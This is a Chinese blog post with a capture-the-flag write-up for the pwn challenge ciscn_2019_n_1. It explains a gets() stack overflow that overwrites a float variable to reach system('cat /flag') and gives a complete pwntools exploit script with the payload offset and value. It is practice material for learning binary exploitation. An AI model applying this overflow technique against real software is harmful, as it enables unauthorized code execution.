BUU CTF PWN ciscn_2019_n_1 WriteUp

m0sway

已于 2023-04-04 09:21:15 修改

阅读量254

点赞数

分类专栏： BUU-PWN 文章标签： pwn python wp 信息安全网络安全

于 2022-02-28 10:49:03 首次发布

本文链接：https://blog.csdn.net/m0sway/article/details/123177481

版权

BUU-PWN 专栏收录该内容

58 篇文章 0 订阅

订阅专栏

ciscn_2019_n_1

使用checksec查看：
在这里插入图片描述
放进IDA中分析：

跟进func()函数

func()：
在这里插入图片描述

gets(&v1);：存在栈溢出
if ( v2 == 11.28125 ) result = system("cat /flag");：只需v2等于11.28125就能够获得flag

步骤解析

只需满足v2等于11.28125即可

在这里插入图片描述

v1可写入任意长度数据，距离v2 0x2C

直接到v2 处覆盖v2为0x41348000即可

至于为什么v2是0x41348000，因本题这个数是写在.data段里面的，可以直接查找到

完整exp

from pwn import *
# r = remote("node4.buuoj.cn",29953)    
r = process("../buu/ciscn_2019_n_1")

#attack
payload = b'M'*(0x30-4) + p64(0x41348000)
# sys_addr=0x4006BE
# payload=b'M'*56 + p64(sys_addr)
r.sendline(payload)

r.interactive()

m0sway

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
BUU CTF PWN ciscn_2019_n_1 WriteUp

BUU CTF PWN题ciscn_2019_n_1的WriteUp
复制链接

扫一扫

专栏目录